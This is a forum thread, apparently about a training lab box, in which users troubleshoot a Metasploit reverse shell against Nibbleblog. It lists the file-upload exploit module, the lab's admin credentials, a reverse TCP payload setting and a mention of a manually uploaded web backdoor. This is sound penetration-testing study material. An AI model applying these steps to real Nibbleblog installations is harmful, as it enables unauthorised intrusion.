When i was trying to Achieve the reverse shell using “Alternate User Method - Metasploit” i Encountered some weird error
i tried to even copy the whole steps one by one and it even gave me 90% of the similar output Shown in the Method but i was not able to run any command in the Metasploit session -here are the settings i used-
LHOSTS as my IP
RHOSTS as Target ip
set username admin
set password nibbles
set TARGETURI nibbleblog
set payload generic/shell_reverse_tcp
and The exploit was exploit/multi/http/nibbleblog_file_upload
i was able to achieve the Reverse TCP shell connection but was not able to navigate through the session as none of the commands were responding like i tried to cd /home/nibbler/ or cd ~ or cd /home
i was only able to use the ls command which was showing me the db.xml file i thinck which was located in the directory – http:///nibbleblog/content/private/plugins/my_image/
For me i did not use the metasploit one, I did it manually by uploading a simple backdoor and running my commands in the web URL to get a shell
Yes i did apply that method but i also wanted to check the alternate method Thats why i was asking and you should also give it a try… and maybe correct me
if you’re sure that the LHOST, LPORT and RHOST configuration is all correct, I suggest trying with different payloads : try show payloads, and set payload NUMBER, where NUMBER is the number of the payload shown in the list. Sometimes cycling the payloads is enough to get a working connection.
Ok i was able to Gain access using Metasploit Using my own KALI Virtual Box I guess i was doing it right before but i was bad at navigation i guess or there was something wrong because when i used the same command earlier in PWNBOX to cd /home it was not showing any results but now it was showing the nibbler Dir…
and maybe correct me 